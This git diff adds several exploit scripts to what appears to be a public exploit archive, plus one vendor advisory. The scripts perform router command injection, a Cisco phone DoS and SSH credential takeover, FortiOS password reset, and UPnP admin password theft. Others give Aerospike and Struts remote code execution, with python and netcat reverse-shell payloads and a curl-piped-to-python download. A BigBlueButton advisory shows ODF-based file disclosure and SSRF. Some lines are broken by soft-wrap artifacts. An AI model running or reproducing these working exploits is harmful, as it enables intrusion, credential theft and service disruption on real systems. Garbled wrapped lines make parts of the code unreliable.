diff --git a/exploits/cgi/webapps/49079.py b/exploits/cgi/webapps/49079.py
new file mode 100755
index 000000000..b05e5de7f
--- /dev/null
+++ b/exploits/cgi/webapps/49079.py
@@ -0,0 +1,120 @@
+# Exploit Title: Gemtek WVRTM-127ACN 01.01.02.141 - Authenticated Arbitrary Command Injection 
+# Date: 13/09/2020                                         
+# Exploit Author: Gabriele Zuddas                         
+# Version: 01.01.02.127, 01.01.02.141                      
+# CVE : CVE-2020-24365                                     
+
+
+Service Provider : 	Linkem
+Product Name : 	LTE CPE
+Model ID : 	WVRTM-127ACN
+Serial ID :	GMK170418011089
+IMEI : 	XXXXXXXXXXXXX
+ICCID : 	XXXXXXXXXXXXXXXXXX
+Firmware Version : 	01.01.02.141
+Firmware Creation Date : 	May 15 13:04:30 CST 2019
+Bootrom Version : 	U-Boot 1.1.3
+Bootrom Creation Date : 	Oct 23 2015 - 16:03:05
+LTE Support Band : 	42,43
+
+
+Injecting happens here:
+
+sh -c (ping -4 -c 1 -s 4 -W 1 "INJECTION" > /tmp/mon_diag.log 2>&1; cmscfg -s -n mon_diag_status -v 0)&
+
+
+Exploit has been tested on older verions too:
+    Firmware Version: 	01.01.02.127
+    Firmware Creation Date : 	May 23 15:34:10 CST 2018
+
+"""
+
+import requests, time, argparse, re, sys
+
+class Exploit():
+    
+    CVE = "CVE-2020-24365"
+    
+    def __init__(self, args):
+        self.args = args
+        self.session = requests.Session()
+    
+    def login(self):
+        s = self.session
+        r = s.post(f"http://{self.args.target}/cgi-bin/sysconf.cgi?page=login.asp&action=login", data={"user_name":self.args.username,"user_passwd":self.args.password})
+        if "sid" not in s.cookies:
+            print("[!] Login failed.")
+            exit(1)
+        sid = s.cookies["sid"]
+        s.headers = {"sid": sid}
+        print(f"[*] Login successful! (sid={sid})")
+    
+    def now(self):
+        return int(time.time() * 1000)
+
+    def exploit(self, command):
+        self.login()
+        
+        with self.session as s:
+            payload = f"http://{self.args.target}/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_monitor_diagnostic&mon_diag_type=0&mon_diag_addr=$({command};)&mon_ping_num=1&mon_ping_size=4&mon_ping_timeout=1&mon_tracert_hops=&mon_diag_protocol_type=4&time={self.now()}&_={self.now()}"
+            
+            r = s.get(payload)
+            r = s.get(f"http://{self.args.target}/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start&notrun=1&time={self.now()}&_={self.now()}")
+            content = str(r.content, "utf8")
+
+            #Attempt to stop the command as some commands tend to get stuck (if commands stop working check on the web interface)
+            r = s.get(payload)
+            r = s.get(f"http://{self.args.target}/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start&notrun=1&time={self.now()}&_={self.now()}")
+            content = str(r.content, "utf8")
+            
+            #TODO: eventually parse content with regex to clean out the output
+            c = re.findall(r"(?<=ping: bad address \')(.*)(?=\')", content)
+            print(content)
+            print(c[0])
+            
+            if len(c) > 0:
+                return c[0]
+            else:
+                return False
+
+    def download_file(self, url):
+        filename = url.rsplit('/', 1)[-1]
+        
+        if self.args.file is not None:
+            print(f"[*] Attempting download of file '{filename}' from {url} ...")
+    
+            if self.exploit(f"wget {url} -O /tmp/{filename}"):
+                print(f"[*] File saved on {self.args.target}'s /tmp/{filename}.")
+                print(self.exploit(f"du -h /tmp/{filename}"))
+                return True
+            else:
+                print(f"[!] Failed to download {filename} from {url}")
+                return False
+
+    def run(self):
+        if self.args.command is not None:
+            print(self.exploit(self.args.command))
+            exit()
+        if self.args.file is not None:
+            self.download_file(self.args.file)
+            exit()
+
+if __name__ == "__main__":
+    # Create the parser and add arguments
+    parser = argparse.ArgumentParser()
+    parser.add_argument("-t", "--target", dest="target", default="192.168.1.1", help="Vulnerable target")
+    parser.add_argument("-u", "--username", dest="username", default="admin", help="Valid username to use")
+    parser.add_argument("-p", "--password", dest="password", default="admin", help="Valid password to use")
+    parser.add_argument("-c", "--command", dest="command", default=None, help="Command to execute")
+    
+    parser.add_argument("-D", "--download-file", dest="file", default=None, help="Download file on target's /tmp directory")
+
+    args = parser.parse_args()
+
+    # Run exploit
+    X = Exploit(args)
+    if len(sys.argv) > 1:
+        print(f"[*] Exploiting {X.CVE} ...")
+        X.run()
+    else:
+        parser.print_help(sys.stderr)
\ No newline at end of file
diff --git a/exploits/hardware/remote/49057.py b/exploits/hardware/remote/49057.py
new file mode 100755
index 000000000..e1fa44aef
--- /dev/null
+++ b/exploits/hardware/remote/49057.py
@@ -0,0 +1,177 @@
+# Exploit Title: Cisco 7937G 1-4-5-7 - DoS/Privilege Escalation
+# Date: 2020-08-10
+# Exploit Author: Cody Martin
+# Vendor Homepage: https://cisco.com
+# Version: <=SIP-1-4-5-7
+# Tested On: SIP-1-4-5-5, SIP-1-4-5-7
+#!/usr/bin/python
+
+import sys
+import getopt
+import requests
+import paramiko
+import socket
+import os
+
+
+def main(argv):
+    target = ""
+    attack = ""
+    username = ""
+    password = ""
+    divider = "====================
+==========================
+="
+
+    help_text = '''
+exploit.py -t/--target ip-address-of-target -a/--attack attack-type [-u/--u=
+ser username -p/--password password]
+%s
+Example: exploit.py -t 192.168.1.200 -a 1
+Example: exploit.py --target 192.168.1.200 --attack 3 --user bob --password=
+ villa
+%s
+Attack types:
+1: DoS with automatic device reset
+2: DoS without automatic device reset
+3: Change SSH credentials of target device
+''' % (divider, divider)
+
+    if len(sys.argv) == 1:
+        print(help_text)
+        sys.exit(2)
+    try:
+        opts, args = getopt.getopt(argv, "ht:a:u:p:", ["help", "target==
+", "attack=", "user=", "password="])
+    except getopt.GetoptError:
+        print(help_text)
+        sys.exit(2)
+    for opt, arg in opts:
+        if opt == "-h":
+            print(help_text)
+            sys.exit()
+        elif opt in ("-t", "--target"):
+            target = arg
+        elif opt in ("-a", "--attack"):
+            attack = arg
+        elif opt in ("-u", "--user"):
+            username = arg
+        elif opt in ("-p", "--password"):
+            password = arg
+
+    if username != "" and password != "" and attack == "3":
+        print("Starting SSH attack!")
+        print(divider)
+        print("Target: ", target, "\nAttack: ", attack, "\nUser: ", usernam=
+e, "\nPassword: ", password)
+        finished = attack_ssh(target, username, password)
+    elif attack == "1":
+        print("Starting DoS reset attack!")
+        print(divider)
+        print("Target: ", target, "\nAttack: ", attack)
+        finished = dos_one(target)
+    elif attack == "2":
+        print("Starting DoS non-reset attack!")
+        print(divider)
+        print("Target: ", target, "\nAttack: ", attack)
+        finished = dos_two(target)
+
+    print(divider)
+
+    if finished == 1:
+        print("DoS reset attack completed!")
+    elif finished == 2:
+        print("DoS non-reset attack completed!")
+        print("Device must be power cycled to restore functionality.")
+    elif finished == 3:
+        tell = "SSH attack finished!\nTry to login using the supplied cre=
+dentials %s:%s" % (username, password)
+        connection_example = "ssh -oKexAlgorithms=+diffie-hellman-group=
+1-sha1 %s@%s" % (username, target)
+        print(tell)
+        print("You must specify the key exchange when connecting or the dev=
+ice will be DoS'd!")
+        print(connection_example)
+    elif finished == 0:
+        print("Something strange happened. Attack likely unsuccessful.")
+    sys.exit()
+
+
+def dos_one(target):
+    url = "http://%s/localmenus.cgi" % target
+    data = "A"*46
+    payload = {"func": "609", "data": data, "rphl": "1"}
+    print("FIRING ZE MIZZLES!")
+    for i in range(1000):
+        try:
+            r = requests.post(url=url, params=payload, timeout=5)
+            if r.status_code != 200:
+                print("Device doesn't appear to be functioning or web acces=
+s is not enabled.")
+                sys.exit()
+        except requests.exceptions.RequestException:
+            return 1
+
+    return 0
+
+
+def dos_two(target):
+    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    sock.settimeout(15)
+    try:
+        sock.connect((target, 22))
+    except OSError:
+        print("Device doesn't appear to be functioning (already DoS'd?) or =
+SSH is not enabled.")
+        sys.exit()
+
+    transport = paramiko.Transport(sock=sock, disabled_algorithms={"k=
+ex": ["diffie-hellman-group-exchange-sha1",
+                                                                           =
+"diffie-hellman-group14-sha1",
+                                                                           =
+"diffie-hellman-group1-sha1"]})
+
+    fd = os.open("/dev/null", os.O_WRONLY)
+    savefd = os.dup(2)
+    os.dup2(fd, 2)
+
+    try:
+        transport.connect(username="notreal", password="notreal")
+    except (paramiko.ssh_exception.SSHException, OSError, paramiko.SSHExcep=
+tion):
+        os.dup2(savefd, 2)
+        return 2
+
+    return 0
+
+
+def attack_ssh(target, username, password):
+    url = "http://%s/localmenus.cgi" % target
+    payload_user = {"func": "403", "set": "401", "name1": username, "name=
+2": username}
+    payload_pass = {"func": "403", "set": "402", "pwd1": password, "pwd2"=
+: password}
+    print("FIRING ZE MIZZLES!")
+    try:
+        r = requests.post(url=url, params=payload_user, timeout=5)
+        if r.status_code != 200:
+            print("Device doesn't appear to be functioning or web access is=
+ not enabled.")
+            sys.exit()
+
+        r = requests.post(url=url, params=payload_pass, timeout=5)
+        if r.status_code != 200:
+            print("Device doesn't appear to be functioning or web access is=
+ not enabled.")
+            sys.exit()
+    except requests.exceptions.RequestException:
+        print("Device doesn't appear to be functioning or web access is not=
+ enabled.")
+        sys.exit()
+
+    return 3
+
+
+if __name__ == "__main__":
+    main(sys.argv[1:])
\ No newline at end of file
diff --git a/exploits/hardware/remote/49075.py b/exploits/hardware/remote/49075.py
new file mode 100755
index 000000000..6fac1ca42
--- /dev/null
+++ b/exploits/hardware/remote/49075.py
@@ -0,0 +1,29 @@
+# Exploit Title: Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure
+# Date: 17th November 2020
+# Exploit Author: Nitesh Surana
+# Vendor Homepage: https://www.gxgroup.eu/ont-products/
+# Version: P4410-V2-1.34H
+# Tested on: Windows/Kali
+# CVE : CVE-2020-25988
+
+import upnpy
+
+upnp = upnpy.UPnP()
+
+# Discover UPnP devices on the network
+# Returns a list of devices e.g.: [Device <Econet IGD>]
+devices = upnp.discover()
+
+# Select the device directly from the list
+device = devices[0]
+
+# Get the services available for this device
+# Returns a list of services available for the device
+# device.get_services()
+
+# We can now access a specific service on the device by its ID like a dictionary 
+service = device['DeviceInfo1']
+
+# Execute the action by its name (in our case, the 'X_GetAccess' action)
+# Returns a dictionary containing the cleartext password of 'admin' user.
+print("Admin Password: {}".format(service.X_GetAccess()['NewX_RootPassword']))
\ No newline at end of file
diff --git a/exploits/hardware/webapps/49074.py b/exploits/hardware/webapps/49074.py
new file mode 100755
index 000000000..effe189da
--- /dev/null
+++ b/exploits/hardware/webapps/49074.py
@@ -0,0 +1,37 @@
+# Exploit Title: Fortinet FortiOS 6.0.4 - Unauthenticated SSL VPN User Password Modification
+# Google Dork: intitle:"Please Login" "Use FTM Push"
+# Date: 15/11/2020
+# Exploit Author: Ricardo Longatto
+# Details: This exploit allow change users password from SSLVPN web portal
+# Vendor Homepage: https://www.fortinet.com/
+# Version: Exploit to Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.8 and 5.4.1 to 5.4.10.
+# Tested on: 6.0.4
+# NVD: https://nvd.nist.gov/vuln/detail/CVE-2018-13382
+# CVE : CVE-2018-13382
+# Credits: Vulnerability by Meh Chang and Orange Tsai.
+
+#!/usr/bin/env python
+
+import requests, urllib3, sys, re, argparse
+urllib3.disable_warnings()
+
+menu = argparse.ArgumentParser(description = "[+] Exploit FortiOS Magic backdoor - CVE-2018-13382 [+]")
+menu.add_argument('-t', metavar='Target/Host IP', required=True)
+menu.add_argument('-p', metavar='Port', required=True)
+menu.add_argument('-u', metavar='User', required=True)
+menu.add_argument('--setpass', metavar='SetNewPass', default='h4ck3d', help='set the password for user, if you not set, the default password will be set to h4ck3d')
+op = menu.parse_args()
+
+host = op.t
+port = op.p
+user = op.u
+setpass = op.setpass
+
+url = "https://"+host+":"+port+"/remote/logincheck"
+exploit = {'ajax':'1','username':user,'magic':'4tinet2095866','credential':setpass}
+r = requests.post(url, verify=False, data = exploit)
+
+if re.search("/remote/hostcheck_install",r.text):
+    print "[+] - The new password to ["+user+"] is "+setpass+" <<<< [+]"
+else:
+    print "Exploit Failed. :/"
\ No newline at end of file
diff --git a/exploits/multiple/remote/49067.py b/exploits/multiple/remote/49067.py
new file mode 100755
index 000000000..5ec8e8780
--- /dev/null
+++ b/exploits/multiple/remote/49067.py
@@ -0,0 +1,175 @@
+# Exploit Title: Aerospike Database 5.1.0.3 - OS Command Execution
+# Date: 2020-08-01
+# Exploit Author: Matt S
+# Vendor Homepage: https://www.aerospike.com/
+# Version: < 5.1.0.3
+# Tested on: Ubuntu 18.04
+# CVE : CVE-2020-13151
+
+#!/usr/bin/env python3
+import argparse
+import random
+import os, sys
+from time import sleep
+import string
+
+# requires aerospike package from pip
+import aerospike
+# if this isn't installing, make sure os dependencies are met
+# sudo apt-get install python-dev
+# sudo apt-get install libssl-dev
+# sudo apt-get install python-pip
+# sudo apt-get install zlib1g-dev
+
+PYTHONSHELL = """python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{ip}",{port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'&"""
+NETCATSHELL = 'rm /tmp/ft;mkfifo /tmp/ft;cat /tmp/ft|/bin/sh -i 2>&1|nc {ip} {port} >/tmp/ft&'
+
+def _get_client(cfg):
+	try:
+  		return aerospike.client({
+  			'hosts': [(cfg.ahost, cfg.aport)],
+  			 'policies': {'timeout': 8000}}).connect()
+
+	except Exception as e:
+	  	print(f"unable to access cluster @ {cfg.ahost}:{cfg.aport}\n{e.msg}")
+
+def _send(client, cfg, _cmd):
+	try:
+		print(client.apply((cfg.namespace, cfg.setname, cfg.dummystring ), 'poc', 'runCMD', [_cmd]))
+	except Exception as e:
+		print(f"[-] UDF execution returned {e.msg}")
+
+def _register_udf(client, cfg):
+	try:
+		client.udf_put(cfg.udfpath)
+	except Exception as e:
+		print(f"[-] whoops, couldn't register the udf {cfg.udfpath}")
+		raise e
+
+def _random_string(l):
+	return ''.join([random.choice(string.ascii_lowercase + string.ascii_uppercase) for i in range(l)])
+
+def _populate_table(client, cfg):
+	ns = cfg.namespace
+	setname = cfg.setname
+	print(f"[+] writing to {ns}.{setname}")
+	try:
+		rec = cfg.dummystring
+		client.put((ns, setname, rec), {'pk':cfg.dummystring})
+		print(f"[+] wrote {rec}")
+	except Exception as e:
+		print(f"[-] unable to write record: {e.msg}")
+		try:
+			if e.msg.startswith('Invalid namespace'):
+				print("Valid namespaces: ")
+				for n in _info_parse("namespaces", client).split(";"):
+					print(n.strip())
+		except:
+			pass
+		sys.exit(13)
+
+def _info_parse(k, client):
+	try: 
+		return [i[1] for i in client.info_all(k).values() ][0]
+	except Exception as e:
+		print(f"error retrieving information: {e.msg}")
+		return []
+
+def _is_vuln(_mj, _mi, _pt, _bd):
+	fixed = [5,1,0,0]
+	found = [_mj, _mi, _pt, _bd]
+
+	if fixed == found:
+		return False
+
+	for ix, val in enumerate(found):
+		if val < fixed[ix]:
+			return True
+		elif val == fixed[ix]:
+			pass
+		else:
+			return False
+
+
+def _version_check(client):
+	print("[+] aerospike build info: ", end="")
+	try:
+		_ver = _info_parse("build", client)
+		print(_ver)
+		mj, mi, pt, bd = [int(i) for i in _ver.split('.')]
+		if _is_vuln(mj, mi, pt, bd):
+			print("[+] looks vulnerable")
+			return
+		else:
+			print(f"[-] this instance is patched.")
+			sys.exit(0)
+
+	except Exception as e:
+		print(f"[+] unable to interpret build number due to {e}")
+		print("[+] continuing anyway... ")
+
+def _exploit(cfg):
+	client = _get_client(cfg)
+	
+	if not client:
+		return
+
+	_version_check(client)
+
+	print(f"[+] populating dummy table.")
+	_populate_table(client, cfg)
+
+	print(f"[+] registering udf")
+	
+	_register_udf(client, cfg)
+
+	if cfg.pythonshell or cfg.netcatshell:
+		sys.stdout.flush()
+		print(f"[+] sending payload, make sure you have a listener on {cfg.lhost}:{cfg.lport}", end="")
+		sys.stdout.flush()
+		for i in range(4): 
+			print(".", end="")
+			sys.stdout.flush()
+			sleep(1)
+
+		print(".")
+		_send(client, cfg, PYTHONSHELL.format(ip=cfg.lhost,port=cfg.lport) if cfg.pythonshell else NETCATSHELL.format(ip=cfg.lhost,port=cfg.lport) )
+	
+	if cfg.cmd:
+		print(f"[+] issuing command \"{cfg.cmd}\"")
+		_send(client, cfg, cfg.cmd)
+
+if __name__ == '__main__':
+	if len(sys.argv) == 1:
+		print(f"[+] usage examples:\n{sys.argv[0]} --ahost 10.11.12.13 --pythonshell --lhost=10.0.0.1 --lport=8000")
+		print("... or ... ")
+		print(f"{sys.argv[0]} --ahost 10.11.12.13 --cmd 'echo MYPUBKEY > /root/.ssh/authorized_keys'")
+		sys.exit(0)
+
+	parser = argparse.ArgumentParser(description='Aerospike UDF Command Execution - CVE-2020-13151 - POC')
+	
+	parser.add_argument("--ahost", help="Aerospike host, default 127.0.0.1", default="127.0.0.1")
+	parser.add_argument("--aport", help="Aerospike port, default 3000", default=3000, type=int)
+	parser.add_argument("--namespace", help="Namespace in which to create the record set", default="test")
+	parser.add_argument("--setname", help="Name of set to populate with dummy record(s), default is cve202013151", default=None)
+	parser.add_argument('--dummystring', help="leave blank for a random value, can use a previously written key to target a specific cluster node", default=None)
+	parser.add_argument("--pythonshell", help="attempt to use a python reverse shell (requires lhost and lport)", action="store_true")
+	parser.add_argument("--netcatshell", help="attempt to use a netcat reverse shell (requires lhost and lport)", action="store_true")
+	parser.add_argument("--lhost", help="host to use for reverse shell callback")
+	parser.add_argument("--lport", help="port to use for reverse shell callback")
+	parser.add_argument("--cmd", help="custom command to issue against the underlying host")
+	parser.add_argument('--udfpath', help="where is the udf to distribute? defaults to `pwd`/poc.lua", default=None)
+
+	cfg = parser.parse_args()
+	if not cfg.setname:
+		cfg.setname = 'cve202013151'
+	if not cfg.dummystring:
+		cfg.dummystring = _random_string(16)
+	if not cfg.udfpath:
+		cfg.udfpath = os.path.join(os.getcwd(), 'poc.lua')
+
+	assert cfg.cmd or (cfg.lhost and cfg.lport and (cfg.pythonshell or cfg.netcatshell)), "Must specify a command, or a reverse shell + lhost + lport"
+	if cfg.pythonshell or cfg.netcatshell:
+		assert cfg.lhost and cfg.lport, "Must specify lhost and lport if using a reverse shell"
+
+	_exploit(cfg)
\ No newline at end of file
diff --git a/exploits/multiple/remote/49068.py b/exploits/multiple/remote/49068.py
new file mode 100755
index 000000000..1551ebacf
--- /dev/null
+++ b/exploits/multiple/remote/49068.py
@@ -0,0 +1,163 @@
+# Exploit Title: Apache Struts 2.5.20 - Double OGNL evaluation
+# Date: 08/18/2020
+# Exploit Author: West Shepherd
+# Vendor Homepage: https://struts.apache.org/download.cgi
+# Version: Struts 2.0.0 - Struts 2.5.20 (S2-059)
+# CVE : CVE-2019-0230
+# Credit goes to reporters Matthias Kaiser, Apple InformationSecurity, and the Github example from PrinceFPF.
+# Source(s):
+# https://github.com/PrinceFPF/CVE-2019-0230
+# https://cwiki.apache.org/confluence/display/WW/S2-059
+# *Fix it, upgrade to: https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.22
+
+# !/usr/bin/python
+from sys import argv, exit, stdout, stderr
+import argparse
+import requests
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+import logging
+
+
+class Exploit:
+    def __init__(
+            self,
+            target='',
+            redirect=False,
+            proxy_address=''
+    ):
+        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+        self.target = target
+        self.session = requests.session()
+        self.redirect = redirect
+        self.timeout = 0.5
+        self.proxies = {
+            'http': 'http://%s' % proxy_address,
+            'https': 'http://%s' % proxy_address
+        } \
+            if proxy_address is not None \
+               and proxy_address != '' else {}
+        self.query_params = {}
+        self.form_values = {}
+        self.cookies = {}
+        boundary = "---------------------------735323031399963166993862150"
+        self.headers = {
+            'Content-Type': 'multipart/form-data; boundary=%s' % boundary,
+            'Accept': '*/*',
+            'Connection': 'close'
+        }
+        payload = "%{(#nike='multipart/form-data')." \
+                  "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \
+                  "(#_memberAccess?(#_memberAccess=#dm):" \
+
+"((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
+\
+
+"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
+\
+                  "(#ognlUtil.getExcludedPackageNames().clear())." \
+                  "(#ognlUtil.getExcludedClasses().clear())." \
+                  "(#context.setMemberAccess(#dm)))).(#cmd='{COMMAND}')." \
+
+"(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
+\
+
+"(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." \
+                  "(#p=new
+java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true))." \
+
+"(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse()."
+\
+
+"getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
+\
+                  "(#ros.flush())}"
+
+        self.payload = "--%s\r\nContent-Disposition: form-data;
+name=\"foo\"; " \
+                       "filename=\"%s\0b\"\r\nContent-Type:
+text/plain\r\n\r\nx\r\n--%s--\r\n\r\n" % (
+                           boundary, payload, boundary
+                       )
+
+    def do_get(self, url, params=None, data=None):
+        return self.session.get(
+            url=url,
+            verify=False,
+            allow_redirects=self.redirect,
+            headers=self.headers,
+            cookies=self.cookies,
+            proxies=self.proxies,
+            data=data,
+            params=params
+        )
+
+    def do_post(self, url, data=None, params=None):
+        return self.session.post(
+            url=url,
+            data=data,
+            verify=False,
+            allow_redirects=self.redirect,
+            headers=self.headers,
+            cookies=self.cookies,
+            proxies=self.proxies,
+            params=params
+        )
+
+    def debug(self):
+        try:
+            import http.client as http_client
+        except ImportError:
+            import httplib as http_client
+        http_client.HTTPConnection.debuglevel = 1
+        logging.basicConfig()
+        logging.getLogger().setLevel(logging.DEBUG)
+        requests_log = logging.getLogger("requests.packages.urllib3")
+        requests_log.setLevel(logging.DEBUG)
+        requests_log.propagate = True
+        return self
+
+    def send_payload(self, command='curl --insecure -sv
+https://10.10.10.10/shell.py|python -'):
+        url = self.target
+        stdout.write('sending payload to %s payload %s' % (url, command))
+        resp = self.do_post(url=url, params=self.query_params,
+data=self.payload.replace('{COMMAND}', command))
+        return resp
+
+
+if __name__ == '__main__':
+    parser = argparse.ArgumentParser(add_help=True,
+                                     description='CVE-2020-0230 Struts
+2 exploit')
+    try:
+        parser.add_argument('-target', action='store', help='Target
+address: http(s)://target.com/index.action')
+        parser.add_argument('-command', action='store',
+                            help='Command to execute: touch /tmp/pwn')
+        parser.add_argument('-debug', action='store', default=False,
+help='Enable debugging: False')
+        parser.add_argument('-proxy', action='store', default='',
+help='Enable proxy: 10.10.10.10:8080')
+
+        if len(argv) == 1:
+            parser.print_help()
+            exit(1)
+        options = parser.parse_args()
+
+        exp = Exploit(
+            proxy_address=options.proxy,
+            target=options.target
+        )
+
+        if options.debug:
+            exp.debug()
+            stdout.write('target %s debug %s proxy %s\n' % (
+                options.target, options.debug, options.proxy
+            ))
+
+        result = exp.send_payload(command=options.command)
+        stdout.write('Response: %d\n' % result.status_code)
+
+    except Exception as error:
+
+stderr.write('error in main %s' % str(error))
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49070.txt b/exploits/multiple/webapps/49070.txt
new file mode 100644
index 000000000..7a90d859a
--- /dev/null
+++ b/exploits/multiple/webapps/49070.txt
@@ -0,0 +1,237 @@
+# Exploit Title: BigBlueButton 2.2.25 - Arbitrary File Disclosure and Server-Side Request Forgery
+# Date: 2020-09-11
+# Exploit Author: RedTeam Pentesting GmbH
+# Vendor Homepage: https://bigbluebutton.org/
+# Version: BigBlueButton 2.2.25
+
+
+RedTeam Pentesting discovered a vulnerability in the BigBlueButton web
+conferencing system which allows participants of a conference with
+permissions to upload presentations to read arbitrary files from the
+file system and perform server-side requests. This leads to
+administrative access to the BigBlueButton instance.
+
+
+Details
+=======
+
+Product: BigBlueButton
+Affected Versions: 2.2.25, potentially earlier versions as well
+Fixed Versions: 2.2.27
+Vulnerability Type: Arbitrary File Disclosure and
+                    Server-Side Request Forgery
+Security Risk: medium
+Vendor URL: https://bigbluebutton.org/
+Vendor Status: fixed version released
+Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2020-005
+Advisory Status: published
+CVE: CVE-2020-25820
+CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25820
+
+
+Introduction
+============
+
+"BigBlueButton is a web conferencing system designed for online
+learning."
+
+(from the vendor's homepage)
+
+
+More Details
+============
+
+BigBlueButton is a web conferencing system that allows participants with
+the appropriate privileges to upload files in various formats to be used
+as presentation slides. Among other formats, BigBlueButton accepts
+LibreOffice documents[1]. LibreOffice documents use the XML-based Open
+Document Format for Office Applications (ODF)[2]. For technical
+purposes, uploaded files are converted to PDF format with LibreOffice
+and afterwards to SVG for displaying[6].
+
+The ODF file format supports using the XML Linking Language (XLink) to
+create links between documents[3]. When local files are referenced using
+XLinks, the contents of the respective files are included in the
+generated PDF file when BigBlueButton converts ODF documents with
+LibreOffice. This leads to an arbitrary file disclosure vulnerability,
+allowing malicious participants of conferences to extract files from the
+BigBlueButton server's file system.
+
+LibreOffice also embeds XLinks to remote locations when a document is
+converted, which allows to perform server-side requests.
+
+
+Proof of Concept
+================
+
+Start from an empty ODF Text Document and extract the content:
+
+$ mkdir tmp-doc && cd tmp-doc
+$ unzip ../empty.odt
+Archive:  empty.odt
+ extracting: mimetype
+   creating: Configurations2/accelerator/
+   creating: Configurations2/images/Bitmaps/
+   creating: Configurations2/toolpanel/
+   creating: Configurations2/progressbar/
+   creating: Configurations2/statusbar/
+   creating: Configurations2/toolbar/
+   creating: Configurations2/floater/
+   creating: Configurations2/popupmenu/
+   creating: Configurations2/menubar/
+  inflating: manifest.rdf
+  inflating: meta.xml
+  inflating: settings.xml
+ extracting: Thumbnails/thumbnail.png
+  inflating: styles.xml
+  inflating: content.xml
+  inflating: META-INF/manifest.xml
+
+
+Replace the <office:body> element in the file content.xml with the
+following:
+
+<office:body>
+  <office:text>
+    <text:section text:name="string">
+      <text:section-source
+        xlink:href="file:///etc/passwd"
+        xlink:type="simple"
+        xlink:show="embed"
+        xlink:actuate="onLoad"/>
+    </text:section>
+  </office:text>
+</office:body>
+
+The text document now includes a section that references the external
+file /etc/passwd. Create an new ODF Text Document with the modified
+content:
+
+$ zip -r ../modified.odt *
+
+The document can now be uploaded as a presentation. After the
+conversion, the presentation shows the contents of the file
+/etc/passwd from the system running the BigBlueButton conferencing
+software. To perform server-side requests, substitute the xlink:href
+attribute's value with a remote URL such as http://example.com:
+
+<office:body>
+  <office:text>
+    <text:section text:name="string">
+      <text:section-source
+        xlink:href="http://example.com"
+        xlink:type="simple"
+        xlink:show="embed"
+        xlink:actuate="onLoad"/>
+    </text:section>
+  </office:text>
+</office:body>
+
+When converting a document with this content, LibreOffice will fetch the
+website's content and embed it into the generated PDF file.
+
+
+Workaround
+==========
+
+To work around this issue, the conversion feature should be disabled if
+it is not used. Otherwise, permission to upload presentations should
+only be given to trusted users. Additionally, the allowed file types for
+upload can be restricted to just PDF files.
+
+
+Fix
+===
+
+Update to fixed version 2.2.27. Change API key after update.
+
+
+
+Security Risk
+=============
+
+As shown, the presentation conversion feature of BigBlueButton can be
+used to disclose arbitrary local files. Through the file disclosure,
+attackers can gain access to the credentials of the BigBlueButton
+instance (/usr/share/bbb-web/WEB-INF/classes/bigbluebutton.properties,
+/usr/share/bbb-apps-akka/conf/application.conf), which allows for
+administrative access to BigBlueButton through its API (see [5]),
+including all conferences.
+
+Additionally, it is possible to perform server-side requests. Note that
+this vulnerability is different from CVE-2018-10583 [4], because the
+risk is not the disclosure of credentials sent while fetching remote
+resources, but the ability to access resources that are in the same
+network segment as the BigBlueButton instance, which is possibly not
+accessible from the Internet.
+
+To exploit this vulnerability, attackers need to have access to a
+conference with the ability to upload presentations. While successful
+exploitation of this vulnerability would pose severe consequences for
+the affected BigBlueButton instance, it is only rated to pose a medium
+risk due to the requirement of having presentator access.
+
+
+Timeline
+========
+
+2020-09-11 Vulnerability identified
+2020-09-18 Customer approved disclosure to vendor
+2020-09-22 CVE ID requested
+2020-09-22 CVE ID assigned
+2020-09-24 Requested encrypted communication with vendor
+2020-09-25 Vendor unable to provide encrypted communication,
+           Vendor notified
+2020-09-25 Vendor confirmed being able to reproduce vulnerability,
+           mentioned similar bugreport
+2020-09-25 Requested information whether "similar burgreport"
+           uses the same vulnerability - no answer
+2020-10-13 Again requested information whether "similar burgreport"
+           uses the same vulnerability, whether release shedule is
+           known - no answer
+2020-10-14 Vendor released fixed version (without mentioning vulnerability)
+2020-10-21 Vulnerability published by third party [7]
+2020-10-21 Advisory released
+
+
+References
+==========
+
+[1] https://docs.bigbluebutton.org/support/faq.html#can-i-upload-microsoft-office-documents-to-bigbluebutton
+[2] http://opendocumentformat.org/
+[3] https://www.w3.org/TR/xlink11/
+[4] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10583
+[5] https://docs.bigbluebutton.org/dev/api.html#usage
+[6] https://docs.bigbluebutton.org/support/faq.html#presentations
+[7] https://www.golem.de/news/big-blue-button-das-grosse-blaue-sicherheitsrisiko-2010-151610.html
+
+
+RedTeam Pentesting GmbH
+=======================
+
+RedTeam Pentesting offers individual penetration tests performed by a
+team of specialised IT-security experts. Hereby, security weaknesses in
+company networks or products are uncovered and can be fixed immediately.
+
+As there are only few experts in this field, RedTeam Pentesting wants to
+share its knowledge and enhance the public knowledge with research in
+security-related areas. The results are made available as public
+security advisories.
+
+More information about RedTeam Pentesting can be found at:
+https://www.redteam-pentesting.de/
+
+
+Working at RedTeam Pentesting
+=============================
+
+RedTeam Pentesting is looking for penetration testers to join our team
+in Aachen, Germany. If you are interested please visit:
